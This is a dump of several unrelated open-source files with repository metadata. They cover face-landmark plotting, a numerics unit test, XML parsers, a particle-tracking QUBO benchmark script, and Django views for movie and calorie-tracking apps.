|
Python
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 39
|
2018-07-28T04:37:48.000Z
|
2022-01-20T18:34:37.000Z
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 2
|
2018-08-27T08:19:22.000Z
|
2019-08-16T09:15:34.000Z
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 8
|
2018-07-31T09:33:49.000Z
|
2020-12-06T10:16:53.000Z
|
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
import matplotlib.pyplot as plt
from .face import compute_bbox_size
end_list = np.array([17, 22, 27, 42, 48, 31, 36, 68], dtype=np.int32) - 1
def plot_kpt(image, kpt):
''' Draw 68 key points
Args:
image: the input image
kpt: (68, 3).
'''
image = image.copy()
kpt = np.round(kpt).astype(np.int32)
for i in range(kpt.shape[0]):
st = kpt[i, :2]
image = cv2.circle(image, (st[0], st[1]), 1, (0, 0, 255), 2)
if i in end_list:
continue
ed = kpt[i + 1, :2]
image = cv2.line(image, (st[0], st[1]), (ed[0], ed[1]), (255, 255, 255), 1)
return image
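# Added usage sketch: drawing 68 random keypoints on a blank canvas; the
# random points stand in for real detector output.
def _demo_plot_kpt():
    canvas = np.zeros((256, 256, 3), dtype=np.uint8)
    kpt = np.random.rand(68, 3) * 255
    return plot_kpt(canvas, kpt)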
def build_camera_box(rear_size=90):
point_3d = []
rear_depth = 0
point_3d.append((-rear_size, -rear_size, rear_depth))
point_3d.append((-rear_size, rear_size, rear_depth))
point_3d.append((rear_size, rear_size, rear_depth))
point_3d.append((rear_size, -rear_size, rear_depth))
point_3d.append((-rear_size, -rear_size, rear_depth))
front_size = int(4 / 3 * rear_size)
front_depth = int(4 / 3 * rear_size)
point_3d.append((-front_size, -front_size, front_depth))
point_3d.append((-front_size, front_size, front_depth))
point_3d.append((front_size, front_size, front_depth))
point_3d.append((front_size, -front_size, front_depth))
point_3d.append((-front_size, -front_size, front_depth))
point_3d = np.array(point_3d, dtype=np.float64).reshape(-1, 3)  # np.float is removed in NumPy >= 1.24
return point_3d
def plot_pose_box(image, Ps, pts68s, color=(40, 255, 0), line_width=2):
''' Draw a 3D box as annotation of pose. Ref:https://github.com/yinguobing/head-pose-estimation/blob/master/pose_estimator.py
Args:
image: the input image
Ps: list of (3, 4) affine camera matrices (a single matrix is also accepted).
pts68s: list of (2, 68) or (3, 68) keypoint arrays (a single array is also accepted).
'''
image = image.copy()
if not isinstance(pts68s, list):
pts68s = [pts68s]
if not isinstance(Ps, list):
Ps = [Ps]
for i in range(len(pts68s)):
pts68 = pts68s[i]
llength = compute_bbox_size(pts68)
point_3d = build_camera_box(llength)
P = Ps[i]
# Map to 2d image points
point_3d_homo = np.hstack((point_3d, np.ones([point_3d.shape[0], 1]))) # n x 4
point_2d = point_3d_homo.dot(P.T)[:, :2]
point_2d[:, 1] = - point_2d[:, 1]
point_2d[:, :2] = point_2d[:, :2] - np.mean(point_2d[:4, :2], 0) + np.mean(pts68[:2, :27], 1)
point_2d = np.int32(point_2d.reshape(-1, 2))
# Draw all the lines
cv2.polylines(image, [point_2d], True, color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[1]), tuple(
point_2d[6]), color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[2]), tuple(
point_2d[7]), color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[3]), tuple(
point_2d[8]), color, line_width, cv2.LINE_AA)
return image
def draw_landmarks(img, pts, style='fancy', wfp=None, show_flg=False, **kwargs):
"""Draw landmarks using matplotlib"""
# height, width = img.shape[:2]
# plt.figure(figsize=(12, height / width * 12))
plt.imshow(img[:, :, ::-1])
plt.subplots_adjust(left=0, right=1, top=1, bottom=0)
plt.axis('off')
if not isinstance(pts, (tuple, list)):
pts = [pts]
for i in range(len(pts)):
if style == 'simple':
plt.plot(pts[i][0, :], pts[i][1, :], 'o', markersize=4, color='g')
elif style == 'fancy':
alpha = 0.8
markersize = 4
lw = 1.5
color = kwargs.get('color', 'w')
markeredgecolor = kwargs.get('markeredgecolor', 'black')
nums = [0, 17, 22, 27, 31, 36, 42, 48, 60, 68]
# close eyes and mouths
plot_close = lambda i1, i2: plt.plot([pts[i][0, i1], pts[i][0, i2]], [pts[i][1, i1], pts[i][1, i2]],
color=color, lw=lw, alpha=alpha - 0.1)
plot_close(41, 36)
plot_close(47, 42)
plot_close(59, 48)
plot_close(67, 60)
for ind in range(len(nums) - 1):
l, r = nums[ind], nums[ind + 1]
plt.plot(pts[i][0, l:r], pts[i][1, l:r], color=color, lw=lw, alpha=alpha - 0.1)
plt.plot(pts[i][0, l:r], pts[i][1, l:r], marker='o', linestyle='None', markersize=markersize,
color=color,
markeredgecolor=markeredgecolor, alpha=alpha)
if wfp is not None:
plt.savefig(wfp, dpi=200)
print('Save visualization result to {}'.format(wfp))
if show_flg:
plt.show()
| 35.714286
| 129
| 0.573895
| 720
| 4,750
| 3.629167
| 0.259722
| 0.050899
| 0.049751
| 0.055109
| 0.316877
| 0.252966
| 0.244164
| 0.244164
| 0.224646
| 0.224646
| 0
| 0.07013
| 0.270526
| 4,750
| 132
| 130
| 35.984848
| 0.683983
| 0.098526
| 0
| 0.086957
| 0
| 0
| 0.019664
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.065217
| 0
| 0.141304
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b2c3dcb95bb9538fdb4cb9f25daeb1cf42bc3eb
| 875
|
py
|
Python
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 101
|
2019-03-30T05:23:01.000Z
|
2021-11-27T09:09:40.000Z
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 3
|
2019-04-17T06:04:12.000Z
|
2020-12-14T17:36:01.000Z
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 5
|
2020-02-07T14:29:50.000Z
|
2020-12-09T17:54:07.000Z
|
import cocos.device
import cocos.numerics as cn
import numpy as np
import pytest
test_data = [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 20]],
dtype=np.int32),
np.array([[0.2, 1.0, 0.5], [0.4, 0.5, 0.6], [0.7, 0.2, 0.25]],
dtype=np.float32),
np.array([[0.5, 2.3, 3.1], [4, 5.5, 6], [7 - 9j, 8 + 1j, 2 + 10j]],
dtype=np.complex64)]
@pytest.mark.parametrize("A", test_data)
def test_mean(A):
cocos.device.init()
A_arch = cn.array(A)
# # using numpy
# mean_numpy = np.mean(A)
#
# # using Archimedes
# mean_arch = cn.mean(A_arch)
# test mean over all elements and along each axis
assert np.allclose(np.mean(A), cn.mean(A_arch))
assert np.allclose(np.mean(A, axis=0), cn.mean(A_arch, axis=0))
assert np.allclose(np.mean(A, axis=1), cn.mean(A_arch, axis=1))
| 26.515152
| 80
| 0.537143
| 149
| 875
| 3.087248
| 0.295302
| 0.097826
| 0.06087
| 0.095652
| 0.232609
| 0.167391
| 0.117391
| 0
| 0
| 0
| 0
| 0.088468
| 0.276571
| 875
| 32
| 81
| 27.34375
| 0.638231
| 0.121143
| 0
| 0
| 0
| 0
| 0.001319
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b332b95f4298d84e9d671c6d88abc96e79fcae6
| 7,145
|
py
|
Python
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 3
|
2015-08-02T09:03:28.000Z
|
2017-12-06T09:26:14.000Z
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 5
|
2015-08-17T01:16:35.000Z
|
2015-09-16T21:51:27.000Z
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 6
|
2015-05-17T15:32:20.000Z
|
2020-04-22T08:43:16.000Z
|
import cStringIO
import StringIO
import pickle  # needed by StoredSaxParser.process_document below
from xml.sax import make_parser, ErrorHandler, SAXParseException
from xml.sax import InputSource as SaxInput
from xml.dom.minidom import parseString as domParseString
from xml.parsers.expat import ExpatError
from lxml import etree
from cheshire3.baseObjects import Parser
from cheshire3.record import (
SaxRecord,
SaxContentHandler,
DomRecord,
MinidomRecord,
MarcRecord
)
from cheshire3.record import LxmlRecord
from cheshire3.utils import nonTextToken
from exceptions import XMLSyntaxError
class BaseParser(Parser):
def _copyData(self, doc, rec):
# Utility function to update data on record from document
rec.id = doc.id
rec.filename = doc.filename
rec.tagName = doc.tagName
rec.processHistory = doc.processHistory
rec.processHistory.append(self.id)
if doc.documentStore:
rec.parent = ('document', doc.documentStore, doc.id)
elif doc.parent:
rec.parent = doc.parent
class MinidomParser(BaseParser):
"""Use default Python Minidom implementation to parse document."""
def process_document(self, session, doc):
xml = doc.get_raw(session)
try:
dom = domParseString(xml)
except ExpatError as e:
raise XMLSyntaxError(e.message)
rec = MinidomRecord(dom, xml)
self._copyData(doc, rec)
return rec
class SaxParser(BaseParser):
"""Default SAX based parser. Creates SaxRecord."""
_possibleSettings = {
'namespaces': {
'docs': "Enable namespace processing in SAX"
},
'stripWhitespace': {
'docs': "Strip additional whitespace when processing."
},
'attrHash': {
'docs': "Tag/Attribute combinations to include in hash."
}
}
def __init__(self, session, config, parent):
Parser.__init__(self, session, config, parent)
self.parser = make_parser()
self.errorHandler = ErrorHandler()
self.parser.setErrorHandler(self.errorHandler)
self.inputSource = SaxInput()
ch = SaxContentHandler()
self.contentHandler = ch
self.parser.setContentHandler(ch)
self.keepError = 1
if (self.get_setting(session, 'namespaces')):
self.parser.setFeature('http://xml.org/sax/features/namespaces',
1)
p = self.get_setting(session, 'attrHash')
if (p):
l = p.split()
for i in l:
(a, b) = i.split("@")
try:
ch.hashAttributesNames[a].append(b)
except KeyError:
ch.hashAttributesNames[a] = [b]
if self.get_setting(session, 'stripWhitespace'):
ch.stripWS = 1
def process_document(self, session, doc):
xml = doc.get_raw(session)
if isinstance(xml, unicode):
# SAX parser cannot deal with unicode
xml = xml.encode('utf-8')
self.inputSource.setByteStream(cStringIO.StringIO(xml))
ch = self.contentHandler
ch.reinit()
try:
self.parser.parse(self.inputSource)
except SAXParseException as e:
# Splat. Reset self and reraise
if self.keepError:
# Work out path
path = []
for l in ch.pathLines:
line = ch.currentText[l]
elemName = line[2:line.index('{') - 1]
path.append("%s[@SAXID='%s']" % (elemName, l))
self.errorPath = '/'.join(path)
else:
ch.reinit()
raise XMLSyntaxError(str(e))
rec = SaxRecord(ch.currentText, xml, wordCount=ch.recordWordCount)
rec.elementHash = ch.elementHash
rec.byteCount = len(xml)
self._copyData(doc, rec)
ch.reinit()
return rec
class StoredSaxParser(BaseParser):
def process_document(self, session, doc):
data = doc.get_raw(session)
data = unicode(data, 'utf-8')
sax = data.split(nonTextToken)
if sax[-1][0] == "9":
line = sax.pop()
elemHash = pickle.loads(str(line[2:]))
else:
elemHash = {}
rec = SaxRecord(sax)
rec.elementHash = elemHash
return rec
class LxmlParser(BaseParser):
""" lxml based Parser. Creates LxmlRecords """
_possibleSettings = {
'validateDTD': {
'docs': ("Validate to DTD while parsing (if a DTD was "
"referenced by the Document.)"),
'type': int,
'options': "0|1"
},
'allowNetwork': {
'docs': ("Allow network access to look up external documents "
"(DTDs etc.)"),
'type': int,
'options': "0|1"
}
}
def __init__(self, session, config, parent):
BaseParser.__init__(self, session, config, parent)
dtdVal = bool(self.get_setting(session, 'validateDTD', 0))
noNetwork = not self.get_setting(session, 'allowNetwork', 0)
self.parser = etree.XMLParser(dtd_validation=dtdVal,
no_network=noNetwork)
def process_document(self, session, doc):
# Input must be string or stream
data = doc.get_raw(session)
try:
try:
et = etree.parse(StringIO.StringIO(data), self.parser)
except AssertionError:
data = data.decode('utf8')
et = etree.parse(StringIO.StringIO(data), self.parser)
except etree.XMLSyntaxError as e:
raise XMLSyntaxError(e.message)
rec = LxmlRecord(et)
rec.byteCount = len(data)
self._copyData(doc, rec)
return rec
class LxmlSchemaParser(Parser):
pass
class LxmlRelaxNGParser(Parser):
pass
class LxmlHtmlParser(BaseParser):
"""lxml based parser for HTML documents."""
def __init__(self, session, config, parent):
BaseParser.__init__(self, session, config, parent)
self.parser = etree.HTMLParser()
def process_document(self, session, doc):
data = doc.get_raw(session)
et = etree.parse(StringIO.StringIO(data), self.parser)
rec = LxmlRecord(et)
rec.byteCount = len(data)
self._copyData(doc, rec)
return rec
class PassThroughParser(BaseParser):
"""Take a Document that already contains parsed data and return a Record.
Copy the data from a document (eg list of sax events or a dom tree) into
an appropriate record object.
"""
def process_document(self, session, doc):
# Simply copy data into a record of appropriate type
data = doc.get_raw(session)
if isinstance(data, list):
rec = SaxRecord(data)
else:
rec = DomRecord(data)
self._copyData(doc, rec)
return rec
class MarcParser(BaseParser):
"""Creates MarcRecords which fake the Record API for Marc."""
def process_document(self, session, doc):
return MarcRecord(doc)
| 31.065217
| 77
| 0.588383
| 759
| 7,145
| 5.467721
| 0.300395
| 0.034458
| 0.030361
| 0.037108
| 0.256867
| 0.220241
| 0.18988
| 0.155663
| 0.136867
| 0.113735
| 0
| 0.004477
| 0.312246
| 7,145
| 229
| 78
| 31.200873
| 0.840049
| 0.088873
| 0
| 0.323864
| 0
| 0
| 0.076947
| 0
| 0
| 0
| 0
| 0
| 0.005682
| 1
| 0.0625
| false
| 0.017045
| 0.068182
| 0.005682
| 0.238636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e26ff289e7c1f363b136e3f4b93da4585664e71
| 6,275
|
py
|
Python
|
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
from hepqpr.qallse import *
from hepqpr.qallse.plotting import *
from hepqpr.qallse.cli.func import time_this
import time
import pickle
# import the method
from hepqpr.qallse.dsmaker import create_dataset
modelName = "D0"
#modelName = "Mp"
#modelName = "Doublet"
maxTry=1
# 5e-3 : 167 MeV
# 8e-4 : 1.04 GeV
varDensity = []
for ptThr_w in [0.15, 0.20, 0.30, 0.4, 0.50, 0.6, 0.75, 0.9, 1.0, 1.2]:
for ptThr_r in [3e-4, 3.5e-4, 4e-4, 4.5e-4, 5e-4, 6e-4, 7e-4, 8e-4, 9e-4, 1e-3, 1.2e-3, 1.5e-3, 1.7e-3, 2e-3, 2.5e-3, 3e-3, 4e-3, 5e-3]:
varDensity.append((modelName, ptThr_w, ptThr_r, maxTry))
#varDensity = [
# (modelName, 0.20, 5e-3, maxTry),
# (modelName, 1.00, 5e-3, maxTry),
#
#]
picklename = ".tmp.checkpT_curv.pickle"
try:
with open(picklename,'rb') as f:
results = pickle.load(f)
except (OSError, EOFError):
print("No pickle file found; starting with empty results.")
results = {}
for v in varDensity:
nTry = v[3]
for iTry in range(nTry):
k = (v[0], v[1], v[2], iTry)
print (k)
ModelName = k[0]
ptThr_w = k[1]
ptThr_r = k[2]
Density = 0.05
if k in results:
continue
results[k] = {}
results[k]["density"] = Density
results[k]["ptThr_w"] = ptThr_w
results[k]["ptThr_r"] = ptThr_r
results[k]["ModelName"] = ModelName
# dataset creation options
ds_options = dict(
# output directory: output_path+prefix
output_path='/tmp',
#prefix='ds_'+k,
#prefix=prefix,
# size
density = Density,
#phi_bounds = (0.15, 1.05),
# important: no pt cut
high_pt_cut = ptThr_w,
)
prefix = f'ez-{Density}'
if ds_options["high_pt_cut"] > 0:
prefix += f'_hpt-{ds_options["high_pt_cut"]}'
else:
prefix += '_baby'
prefix += f'_{iTry}'
prefix += f'_noPhiCut'
ds_options["prefix"] = prefix
# generate the dataset
import os
path = os.path.join(ds_options['output_path'], prefix, "event000001000")
if os.path.exists(path + "-hits.csv"):
import json
with open(path + "-meta.json") as f:
meta = json.load(f)
with open(path+"-metaHits.pickle", 'rb') as f:
time_info= pickle.load(f)
else:
with time_this() as time_info:
meta, path = create_dataset(**ds_options)
with open(os.path.join(path+"-metaHits.pickle"), 'wb') as f:
pickle.dump(time_info, f)
results[k]['TReadingHits'] = time_info[1]
results[k]['meta']=meta
from hepqpr.qallse.seeding import generate_doublets, SeedingConfig
# generate the doublets: the important part is the config_cls !
if os.path.exists(path + "-doublets.csv"):
doublets = pd.read_csv(path + "-doublets.csv", index_col=0)
with open(path+"-metaDoublets.pickle", 'rb') as f:
time_info = pickle.load(f)  # load cached timing first, then record it below
else:
with time_this() as time_info:
doublets = generate_doublets(hits_path=path+'-hits.csv', config_cls=SeedingConfig)
doublets.to_csv(path+'-doublets.csv')
with open(os.path.join(path+"-metaDoublets.pickle"), 'wb') as f:
pickle.dump(time_info, f)
results[k]['TInitialDoubletBuilding'] = time_info[1]
print('number of doublets = ', len(doublets))
results[k]['Ndoublets'] = len(doublets)
from hepqpr.qallse.qallse import Config
config = Config()
config.tplet_max_curv = ptThr_r
dw = DataWrapper.from_path(path + '-hits.csv')
if modelName == "D0":
from hepqpr.qallse.qallse_d0 import D0Config
new_config = merge_dicts(D0Config().as_dict(), config.as_dict())
model = QallseD0(dw, **new_config)
elif modelName == "Mp":
from hepqpr.qallse.qallse_mp import MpConfig
new_config = merge_dicts(MpConfig().as_dict(), config.as_dict())
model = QallseMp(dw, **new_config)
elif modelName == "Nominal":
from hepqpr.qallse.qallse import Config1GeV
new_config = merge_dicts(Config1GeV().as_dict(), config.as_dict())
model = Qallse1GeV(dw, **new_config)
elif modelName == "Doublet":
from hepqpr.qallse.qallse_doublet import DoubletConfig
new_config = merge_dicts(DoubletConfig().as_dict(), config.as_dict())
model = QallseDoublet(dw, **new_config)
p, r, ms = model.dataw.compute_score(doublets)
results[k]['precision_initDoublet'] = p
results[k]['recall_initDoublet'] = r
results[k]['missing_initDoublet'] = len(ms)
# generate the qubo as usual
with time_this() as time_info:
model.build_model(doublets)
print(f'Time of model building = {time_info[1]:.2f}s.')
results[k]['TModelBuilding'] = time_info[1]
with time_this() as time_info:
Q = model.to_qubo()
print(f'Time of qubo building = {time_info[1]:.2f}s.')
results[k]['TQuboBuilding'] = time_info[1]
results[k]['QuboSize'] = len(Q)
from hepqpr.qallse.cli.func import *
with time_this() as time_info:
response = solve_neal(Q)
print(f'Time of neal = {time_info[1]:.2f}s.')
results[k]['TNeal'] = time_info[1]
final_doublets, final_tracks = process_response(response)
en0 = 0 if Q is None else dw.compute_energy(Q)
en = response.record.energy[0]
results[k]['obsEnergy'] = en
results[k]['idealEnergy'] = en0
occs = response.record.num_occurrences
results[k]['bestOcc'] = occs[0]
results[k]['OccSum'] = occs.sum()
p, r, ms = dw.compute_score(final_doublets)
results[k]['precision'] = p
results[k]['recall'] = r
results[k]['missing'] = len(ms)
trackml_score = dw.compute_trackml_score(final_tracks)
results[k]['trackmlScore'] = trackml_score
with open(picklename, 'wb') as f:
pickle.dump(results, f)
#print(results)
| 35.055866
| 140
| 0.577211
| 824
| 6,275
| 4.258495
| 0.229369
| 0.056996
| 0.050157
| 0.019949
| 0.240809
| 0.169849
| 0.075235
| 0.069535
| 0.053577
| 0.053577
| 0
| 0.031452
| 0.285578
| 6,275
| 178
| 141
| 35.252809
| 0.751283
| 0.07012
| 0
| 0.106061
| 0
| 0
| 0.127645
| 0.021159
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.113636
| 0
| 0.113636
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e287d153cff7385984c9cc16aca63539ed882d4
| 3,382
|
py
|
Python
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 2
|
2019-06-15T01:40:04.000Z
|
2019-12-19T05:11:17.000Z
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 1
|
2021-03-09T05:22:51.000Z
|
2021-03-09T05:22:51.000Z
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 2
|
2019-06-24T19:24:25.000Z
|
2020-05-29T13:57:35.000Z
|
from abc import ABC, abstractmethod
import tmdbsimple as tmdb
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.utils.decorators import method_decorator
from rest_framework.response import Response
from rest_framework.views import APIView
from api.serializers import MovieSerializer
from app.models import Movie, SearchedMovie, User, CollectedMovie
MAX_NUM_CASTS = 4
class AddCollectedMovie(ABC, APIView):
"""
Adds the given movie to the user's favorites or watch list based
on list_type property.
"""
@method_decorator(login_required)
def get(self, request, pk):
user = User.get_user(request.user)
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
try:
collected_item = CollectedMovie.objects.filter(user=user, movie=movie).get()
collected_item.type = self.list_type
except CollectedMovie.DoesNotExist:
collected_item = CollectedMovie(
user=user,
movie=movie,
type=self.list_type
)
collected_item.save()
# success status
return Response('')
@property
@abstractmethod
def list_type(self):
pass
class MovieAddToFavorites(AddCollectedMovie):
"""
Adds the given movie to the user's favorites list.
"""
list_type = CollectedMovie.TYPE_WISH
class MovieAddToWatched(AddCollectedMovie):
"""
Adds the given movie to the user's watch list.
"""
list_type = CollectedMovie.TYPE_WATCH
class RemoveCollectedMovie(APIView):
"""
Removes the given movie to the user's favorites or watch list.
"""
@method_decorator(login_required)
def get(self, request, pk):
user = User.get_user(request.user)
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
CollectedMovie.objects.filter(user=user, movie=movie).delete()
# success status
return Response('')
class MovieInfo(APIView):
"""
Returns movie information from the database (data defined in Movie
model + cast information), if the movie has been already added. If
not, gets the information from TMDB, saves to the database and
then returns it.
"""
def get(self, request, pk):
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
# insert movie into searched movies table
if request.user.is_authenticated:
SearchedMovie.increment_search_count(User.get_user(request.user), movie)
serializer = MovieSerializer(movie)
data = serializer.data
# get actors from TMDB
movie_credits = tmdb.Movies(pk).credits()
data['cast'] = []
for cast in movie_credits['cast'][:MAX_NUM_CASTS]:
cast_data = {k: v for k, v in cast.items() if k in {'character', 'name', 'profile_path'}}
# set default profile photo if no photo is received
# from TMDB
if cast_data['profile_path'] is None:
cast_data['profile_path'] = ''
else:
cast_data['profile_path'] = f'https://image.tmdb.org/t/p/w276_and_h350_face{cast_data["profile_path"]}'
data['cast'].append(cast_data)
return Response(data)
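# Added sketch: how these views might be wired up in a URL configuration. The
# route paths and the urls.py module are hypothetical -- the actual project
# routing is not shown in this file.
#
# from django.urls import path
# from api.views.movies import (MovieAddToFavorites, MovieAddToWatched,
#                               RemoveCollectedMovie, MovieInfo)
#
# urlpatterns = [
#     path('movies/<int:pk>/', MovieInfo.as_view()),
#     path('movies/<int:pk>/favorite/', MovieAddToFavorites.as_view()),
#     path('movies/<int:pk>/watched/', MovieAddToWatched.as_view()),
#     path('movies/<int:pk>/remove/', RemoveCollectedMovie.as_view()),
# ]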
| 27.274194
| 119
| 0.646363
| 411
| 3,382
| 5.192214
| 0.326034
| 0.022493
| 0.032802
| 0.028116
| 0.31537
| 0.278351
| 0.265698
| 0.223524
| 0.223524
| 0.176195
| 0
| 0.007692
| 0.269663
| 3,382
| 123
| 120
| 27.495935
| 0.856275
| 0.181549
| 0
| 0.28125
| 0
| 0
| 0.054287
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.015625
| 0.140625
| 0
| 0.359375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e29911c2cf893692ea46e7dbded4b692a9e33a0
| 3,853
|
py
|
Python
|
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | null | null | null |
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | null | null | null |
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | 1
|
2021-02-15T17:40:23.000Z
|
2021-02-15T17:40:23.000Z
|
from django.shortcuts import render
from django.http import Http404, HttpResponseRedirect
from django.urls import reverse
from apps.index.models import User, UserHistory
from sova_avia.settings import MEDIA_ROOT
from imageai.Prediction import ImagePrediction
import json
from .models import Article
from .forms import ArticleForm
def index(request, user_login):
try:
user = User.objects.get(login=user_login)
except User.DoesNotExist:
raise Http404
return render(request, 'lk/index.html', {'user_instance': user, 'user_login': user_login})
def view_history(request, user_login):
# try:
# history = UserHistory.objects.get(userId = user_login)
# except:
# raise Http404
user_id = User.objects.get(login=user_login).id
return render(request, 'lk/history.html', {'history': UserHistory.objects.all().filter(userId = user_id),
'user_login': user_login})
def settings(request, user_login):
try:
user = User.objects.get(login=user_login)
except User.DoesNotExist:
raise Http404
return render(request, 'lk/settings.html', {'user_instance': user, 'user_login': user_login})
def wait(request, user_login):
if request.POST['password0u'] == request.POST['password1u']:
user = User.objects.get(login=user_login)
user.password = request.POST['password0u']
user.save()  # persist the change; assigning the attribute alone does not hit the database
return HttpResponseRedirect(reverse('lk:index', args=(user_login,)))
else:
return render(request, 'lk/settings.html', {'user_instance': User.objects.get(login=user_login),
'user_login': user_login})
def newPhoto(request, user_login):
if request.method == 'POST':
form = ArticleForm(request.POST, request.FILES)
if form.is_valid():
form.save()
file_name = request.FILES['file_obj']
result = process_image(file_name)
return render(request, 'lk/newPhoto.html', {'form': form, 'user_login': user_login, 'foodVariants': result})
# return render(request, 'lk/newPhoto.html', {'form': request.POST, 'user_login': user_login})
else:
form = ArticleForm()
return render(request, 'lk/newPhoto.html', {'form': form, 'user_login': user_login})
# return render(request, 'lk/newPhoto.html', {'user_login': user_login})
# return render(request, 'lk/newPhoto.html', {'user_login':user_login, 'foodVariants':
# [{'foodName': 'котлетка', 'foodDescription': "мамина"}]})
def process_image(file_name):
execution_path = "../../media/media/"  # note: currently unused
with open(MEDIA_ROOT + '/media/' + 'foods.json') as f:
foods = json.load(f)
prediction = ImagePrediction()
prediction.setModelTypeAsResNet()
prediction.setModelPath(MEDIA_ROOT + "/media/resnet50_weights_tf_dim_ordering_tf_kernels.h5")
prediction.loadModel()
result = []
predictions, probabilities = prediction.predictImage(MEDIA_ROOT + '/media/' + str(file_name), result_count=10)
for eachPrediction, eachProbability in zip(predictions, probabilities):
tmp = dict()
eachPrediction = eachPrediction.replace('_', ' ')
tmp['foodName'] = eachPrediction
tmp['foodDescription'] = eachProbability
calorieAmount = "124 cal"
flag = False
for food in foods:
if food['foodName'] == eachPrediction:
calorieAmount = food['foodDescription']
flag = True
break
if flag:
tmp['foodDescription'] = calorieAmount
result.append(tmp)
return result
def chooseFood(request, user_login, foodName, foodDescription):
UserHistory.objects.create(userId=User.objects.get(login=user_login), foodName=foodName, foodDescription=foodDescription)
return HttpResponseRedirect(reverse('lk:index', args=(user_login,)))
| 35.675926
| 125
| 0.659227
| 426
| 3,853
| 5.819249
| 0.267606
| 0.119806
| 0.090359
| 0.07261
| 0.376361
| 0.318677
| 0.275111
| 0.260186
| 0.217426
| 0.161355
| 0
| 0.007631
| 0.217752
| 3,853
| 107
| 126
| 36.009346
| 0.814864
| 0.102777
| 0
| 0.194444
